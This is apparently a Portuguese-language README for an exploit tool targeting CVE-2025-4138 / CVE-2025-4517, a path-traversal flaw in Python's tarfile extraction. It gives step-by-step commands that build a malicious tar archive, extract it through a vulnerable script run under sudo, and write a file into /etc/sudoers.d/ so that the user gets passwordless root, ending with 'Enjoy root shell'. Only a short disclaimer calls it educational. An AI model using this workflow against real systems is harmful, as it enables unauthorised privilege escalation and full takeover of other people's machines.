
Um script Python para gerar um arquivo tar malicioso que explora CVE-2025-4138 / CVE-2025-4517.
Um script Python para gerar um arquivo tar malicioso que explora CVE-2025-4138 / CVE-2025-4517 (Path Traversal via Truncamento de PATH_MAX).
Explorar com sucesso esta vulnerabilidade permite que um invasor ignore os filtros de extração do tarfile e escreva arquivos arbitrários no sistema de arquivos. Esta ferramenta tem como alvo específico /etc/sudoers.d/ para conceder privilégios de root sem senha.
Gere o payload de exploração:
python3 exploit.py -o exploit.tar
-o, --output: Obrigatório. O caminho para salvar o arquivo tar malicioso.-u, --user: Opcional. O nome de usuário alvo para conceder privilégios sudo. Padrão é o usuário atual que executa o script.exploit.tar.
python3 exploit.py -o exploit.tar
exploit.tar para a máquina alvo.sudo /usr/local/bin/python3 vulnerable.py -b exploit.tar -r restore_final
/etc/sudoers.d/<username> é criado.
sudo su
# Enjoy root shell
Esta ferramenta é apenas para fins educacionais e pesquisa de segurança autorizada. O uso indevido deste software viola a lei. O autor não se responsabiliza por qualquer dano causado pelo uso desta ferramenta.
CVE-2025-4138 Auto-Sudo por kyakei